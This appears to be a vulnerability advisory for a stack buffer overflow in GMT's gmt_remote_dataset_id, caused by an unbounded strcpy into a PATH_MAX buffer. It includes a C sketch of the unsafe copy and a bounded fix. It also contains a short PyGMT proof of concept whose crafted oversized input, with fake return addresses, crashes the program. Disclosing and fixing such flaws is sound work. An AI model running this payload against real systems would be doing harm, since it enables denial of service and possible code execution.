Summary
A stack-based buffer overflow vulnerability was identified in the gmt_remote_dataset_id function within src/gmt_remote.c. This issue occurs when a specially crafted long string is passed as a dataset identifier (e.g., via the which module), leading to a crash or potential arbitrary code execution.
Details
The vulnerability is caused by the unsafe use of strcpy (or similar unbounded string operations) when copying a user-controlled dataset name into a fixed-size stack buffer file[PATH_MAX].
- Vulnerable Function: gmt_remote_dataset_id
- Vulnerable File: src/gmt_remote.c
- Root Cause: Lack of input length validation before copying to a stack buffer.
When an input exceeds PATH_MAX (typically 4096 bytes), it overwrites the stack frame, including the return address. This was confirmed using AddressSanitizer (ASan), which reported a stack-buffer-overflow.
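The root cause above, illustrated with an added example that is not GMT's code: a hypothetical stand-in for the unbounded copy into file[PATH_MAX], beside a bounded replacement that rejects any name that cannot fit together with its terminating NUL. The function names and the sample dataset name are assumptions made for the illustration.

```c
#include <limits.h>
#include <stdlib.h>
#include <string.h>

#ifndef PATH_MAX
#define PATH_MAX 4096   /* fallback for platforms that do not define it */
#endif

/* Pattern the advisory describes (hypothetical stand-in, not GMT's code):
 * an unbounded strcpy of a caller-controlled name into a fixed stack
 * buffer. Kept only for contrast; it is never called here. */
void copy_dataset_name_unsafe(const char *name) {
    char file[PATH_MAX];
    strcpy(file, name);   /* no length check: long input overwrites the frame */
    (void)file;
}

/* Hardened form: bound the scan, reject anything that cannot fit with
 * its terminating NUL, then copy exactly the checked length.
 * Returns 0 on success, -1 if the name is too long. */
int copy_dataset_name_checked(const char *name, char *dst, size_t dstsz) {
    const char *nul = memchr(name, '\0', dstsz); /* never reads past dstsz */
    if (nul == NULL)
        return -1;                 /* no terminator within the buffer size */
    size_t n = (size_t)(nul - name);
    memcpy(dst, name, n + 1);      /* n bytes plus the NUL, n + 1 <= dstsz */
    return 0;
}

/* Mirrors the stack-buffer layout from the advisory: file[PATH_MAX].
 * Returns 1 if the name was accepted, 0 if it was rejected. */
int dataset_name_accepted(const char *name) {
    char file[PATH_MAX];
    return copy_dataset_name_checked(name, file, sizeof file) == 0;
}

/* Boundary helper: builds a constructed name of 'len' repeated 'A'
 * characters (like the advisory's padding) and reports whether the
 * checked copy accepts it. */
int dataset_name_accepted_len(size_t len) {
    char *name = malloc(len + 1);
    if (name == NULL)
        return 0;
    memset(name, 'A', len);
    name[len] = '\0';
    int ok = dataset_name_accepted(name);
    free(name);
    return ok;
}
```

With this check in place, the padding from the PoC is rejected before any copy happens, so the stack frame is never written past the buffer.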
PoC
The following Python script using PyGMT reproduces the crash:
import struct
from pygmt.clib import Session

with Session() as lib:
    # Payload designed to overflow the stack buffer
    padding = "A" * 4096
    fake_ret = struct.pack("<Q", 0x4141414141414141) * 100
    payload = padding + fake_ret.decode("latin-1")
    # Trigger the overflow via the 'which' module
    lib.call_module("which", [payload])
Impact
This is a memory safety vulnerability.
- Who is impacted: Any user or application using GMT via the C API or higher-level interfaces like PyGMT that processes untrusted dataset names.
- Consequences: At minimum, it causes a Denial of Service (DoS) via program crash. In certain environments, it could potentially be exploited for arbitrary code execution.